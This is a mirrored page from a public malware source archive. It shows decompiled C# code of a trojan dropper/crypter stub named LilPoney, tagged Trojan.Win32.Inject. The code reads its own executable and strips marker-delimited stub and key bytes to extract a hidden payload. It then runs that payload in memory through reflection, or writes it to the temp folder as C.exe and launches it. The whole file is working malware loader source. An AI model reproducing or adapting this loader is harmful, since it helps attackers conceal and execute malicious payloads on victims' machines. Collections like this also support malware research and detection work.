mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 00:58:52 +00:00
127 lines
3.6 KiB
C#
127 lines
3.6 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: LilPoney.Program
|
|
// Assembly: LilPoney, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 1C63AA57-9559-4CD2-A85A-70799118F319
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Inject.aagsb-7963deb448437c7505789ca0bcb4b13edfc5b040b6004eeb17e9d495e54067ff.exe
|
|
|
|
using System;
|
|
using System.Collections.Generic;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
|
|
namespace LilPoney
|
|
{
|
|
internal class Program
|
|
{
|
|
private static byte[] CRYPT_KEY = new byte[8]
|
|
{
|
|
(byte) 5,
|
|
(byte) 6,
|
|
(byte) 21,
|
|
(byte) 22,
|
|
(byte) 64,
|
|
(byte) 69,
|
|
(byte) 133,
|
|
(byte) 101
|
|
};
|
|
private static byte[] SPLIT_KEY = new byte[8]
|
|
{
|
|
(byte) 5,
|
|
(byte) 69,
|
|
(byte) 135,
|
|
(byte) 24,
|
|
(byte) 38,
|
|
(byte) 20,
|
|
(byte) 8,
|
|
(byte) 119
|
|
};
|
|
|
|
private static void Main(string[] args)
|
|
{
|
|
byte[] numArray = new byte[0];
|
|
StreamReader streamReader = new StreamReader(Process.GetCurrentProcess().MainModule.FileName);
|
|
byte[] bytesWithoutCrypt = Program.getAllBytesWithoutCrypt(Program.getAllBytesWithoutStub(new BinaryReader(streamReader.BaseStream).ReadBytes(Convert.ToInt32(streamReader.BaseStream.Length))));
|
|
if (Program.onRunExeByteArray(bytesWithoutCrypt))
|
|
return;
|
|
StreamWriter streamWriter = new StreamWriter(Path.GetTempPath() + "C.exe");
|
|
foreach (byte num in bytesWithoutCrypt)
|
|
streamWriter.BaseStream.WriteByte(num);
|
|
streamWriter.Close();
|
|
Process.Start(Path.GetTempPath() + "C.exe");
|
|
}
|
|
|
|
private static byte[] getAllBytesWithoutStub(byte[] allBytes)
|
|
{
|
|
List<byte> byteList = new List<byte>();
|
|
int num = 0;
|
|
bool flag = false;
|
|
for (int index1 = 0; index1 < allBytes.Length; ++index1)
|
|
{
|
|
if ((int) allBytes[index1] == (int) Program.SPLIT_KEY[0] && num < 2)
|
|
{
|
|
for (int index2 = 0; index2 < Program.SPLIT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.SPLIT_KEY[index2]; ++index2)
|
|
{
|
|
if (index2 == Program.SPLIT_KEY.Length - 1)
|
|
{
|
|
++num;
|
|
index1 += index2;
|
|
}
|
|
}
|
|
}
|
|
if (num == 2)
|
|
{
|
|
if (!flag)
|
|
flag = true;
|
|
else
|
|
byteList.Add(allBytes[index1]);
|
|
}
|
|
}
|
|
return byteList.ToArray();
|
|
}
|
|
|
|
private static byte[] getAllBytesWithoutCrypt(byte[] allBytes)
|
|
{
|
|
List<byte> byteList = new List<byte>();
|
|
bool flag = false;
|
|
for (int index1 = 0; index1 < allBytes.Length; ++index1)
|
|
{
|
|
if ((int) allBytes[index1] == (int) Program.CRYPT_KEY[0])
|
|
{
|
|
for (int index2 = 0; index2 < Program.CRYPT_KEY.Length && (int) allBytes[index1 + index2] == (int) Program.CRYPT_KEY[index2]; ++index2)
|
|
{
|
|
if (index2 == Program.CRYPT_KEY.Length - 1)
|
|
{
|
|
flag = true;
|
|
index1 += index2;
|
|
}
|
|
}
|
|
}
|
|
if (!flag)
|
|
byteList.Add(allBytes[index1]);
|
|
flag = false;
|
|
}
|
|
return byteList.ToArray();
|
|
}
|
|
|
|
private static bool onRunExeByteArray(byte[] allBytes)
|
|
{
|
|
try
|
|
{
|
|
Assembly assembly = Assembly.Load(allBytes);
|
|
MethodInfo entryPoint = assembly.EntryPoint;
|
|
if ((object) entryPoint != null)
|
|
{
|
|
object instance = assembly.CreateInstance(entryPoint.Name);
|
|
entryPoint.Invoke(instance, (object[]) null);
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
return false;
|
|
}
|
|
return true;
|
|
}
|
|
}
|
|
}
|